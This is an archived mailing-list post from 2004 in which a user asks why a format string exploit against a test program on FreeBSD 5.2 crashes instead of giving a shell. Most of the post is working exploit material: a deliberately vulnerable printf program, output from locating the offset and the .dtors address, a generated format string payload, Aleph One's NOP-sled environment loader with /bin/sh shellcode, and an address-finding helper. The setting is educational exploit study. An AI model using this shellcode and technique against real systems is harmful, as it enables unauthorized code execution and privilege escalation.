Vulnerability Development mailing list archives
Problem with format string exploit dev in FreeBSD 5.2-CURRENT
From: Ganbold <ganbold () micom mng net>
Date: Thu, 29 Jul 2004 17:02:50 +0900
Hi all, I have sample format string exploit problem in FreeBSD 5.2-CURRENT. $uname -anFreeBSD localhost 5.2-CURRENT FreeBSD 5.2-CURRENT #8: Wed Mar 3 11:09:58 ULAT 2004 tsgan@localhost:/usr/obj/usr/src/sys/MX i386
I'm using http://www.groar.org/expl/howto/fmtbuilder.txt to build the format string.
I can get the offset: --------------------------------------------------------------------------------------------------------- bash-2.05b$ ./fmt_vuln "AAAA %x %x %x %x %x %x" The right way: AAAA %x %x %x %x %x %x The wrong way: AAAA bfbfdfb8 0 0 0 0 41414141 [*] test_val @ 0x0804977c = -72 0xffffffb8 --------------------------------------------------------------------------------------------------------- Then I'm getting DTORs address: --------------------------------------------------------------------------------------------------------- bash-2.05b$ objdump -s -j .dtors fmt_vuln fmt_vuln: file format elf32-i386-freebsd Contents of section .dtors: 8049824 ffffffff 00000000 ........ bash-2.05b$ nm ./fmt_vuln|grep DTOR 08049828 d __DTOR_END__ 08049824 d __DTOR_LIST__ ---------------------------------------------------------------------------------------------------------Afterwards I'm storing shellcode in env using AlephOne's exploit code (See below).
--------------------------------------------------------------------------------------------------------- $ ./getsx1 200 Using address: 0xbfbfec78 bash-2.05b$ bash-2.05b$ ./getenvaddr EGG EGG is located at 0xbfbfe557 --------------------------------------------------------------------------------------------------------- When I run exploit I get: --------------------------------------------------------------------------------------------------------- bash-2.05b$ ./fmt_vuln `./fmtbuilder -n -a 0x08049828 -r 0xbfbfe557 -o 6 -b 0` Format string builder version 0.2 (C) 2001 Pappy & Zorgon [ Building the fmt string ... ] [ Building completed (52) ] [ Checking the fmt string ... ] [ Checking completed (52) ] [ fmt string ] = %327x%6$n%398x%7$n%218x%8$n%256x%9$n The right way: %327x%6$n%398x%7$n%218x%8$n%256x%9$n The wrong way: Bus error (core dumped) bash-2.05b$ ./fmt_vuln `./fmtbuilder -n -a 0x08049824 -r 0xbfbfe557 -o 6 -b 0` Format string builder version 0.2 (C) 2001 Pappy & Zorgon [ Building the fmt string ... ] [ Building completed (52) ] [ Checking the fmt string ... ] Found a % at 4. [ Checking completed (52) ] [ fmt string ] = %%327x%6$n%398x%7$n%218x%8$n%256x%9$n The right way: %%327x%6$n%398x%7$n%218x%8$n%256x%9$n The wrong way: Bus error (core dumped) --------------------------------------------------------------------------------------------------------- So I get Bus error (core dumped) result. But in my opinion I should get shell. Somehow exploit is not working and I don't know the reason. I tried many times and no result. It seems like format string exploit in FreeBSD is different than Linux.Does anybody have experience developing format string exploit in FreeBSD before?
Did somebody solve this kind of problem before? Can somebody give me some hints, advices and guides?I googled for this kind of problem, and find only in this list last June someone had problem,
but didn't find the solution. Can somebody help me in this regard? thanks in advance, Ganbold Followings are vulnerable program, getenvaddr.c, Aleph One exploit: --------------------------------------------------------------------------------------------------------- Vulnerable program: --------------------------------------------------------------------------------------------------------- #include <stdlib.h> int main(int argc, char *argv[]) { char text[1024]; static int test_val = -72; if(argc < 2) { printf("Usage: %s <text to print>\n", argv[0]); exit(0); } strcpy(text, argv[1]); printf("The right way:\n"); printf("%s", text); printf("\nThe wrong way:\n"); printf(text); printf("\n"); // Debug outputprintf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);
exit(0); } --------------------------------------------------------------------------------------------------------- Aleph One's exploit code --------------------------------------------------------------------------------------------------------- #include <stdlib.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\x31\xc0" /* xorl %eax, %eax */ "\x50" /* pushl %eax */ "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */ "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp, %ebx */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x89\xe2" /* movl %esp, %edx */ "\x50" /* pushl %eax */ "\x52" /* pushl %edx */ "\x53" /* pushl %ebx */ "\x50" /* pushl %eax */ "\xb0\x3b" /* movb $0x3b, %al */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax, %eax */ "\x40" /* inc %eax */ "\x50" /* pushl %eax */ "\x50" /* pushl %eax */ "\xcd\x80"; /* int $0x80 */ unsigned long get_esp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr, *egg; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i, eggsize=DEFAULT_EGG_SIZE; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) eggsize = atoi(argv[3]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(egg = malloc(eggsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_esp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg,"EGG=",4); putenv(egg); memcpy(buff,"RET=",4); putenv(buff); system("/usr/local/bin/bash"); } --------------------------------------------------------------------------------------------------------- getenvaddr.c --------------------------------------------------------------------------------------------------------- #include <stdlib.h> int main(int argc, char *argv[]) { char *addr; if(argc < 2) { printf("Usage:\n%s <environment variable name>\n", argv[0]); exit(0); } addr = getenv(argv[1]); if(addr == NULL) printf("The environment variable %s doesn't exist.\n", argv[1]); else printf("%s is located at %p\n", argv[1], addr); return 0; }
Current thread:
- Problem with format string exploit dev in FreeBSD 5.2-CURRENT Ganbold (Jul 30)
- Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT infamous41md (Jul 31)
- <Possible follow-ups>
- Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT Vlad902 (Jul 30)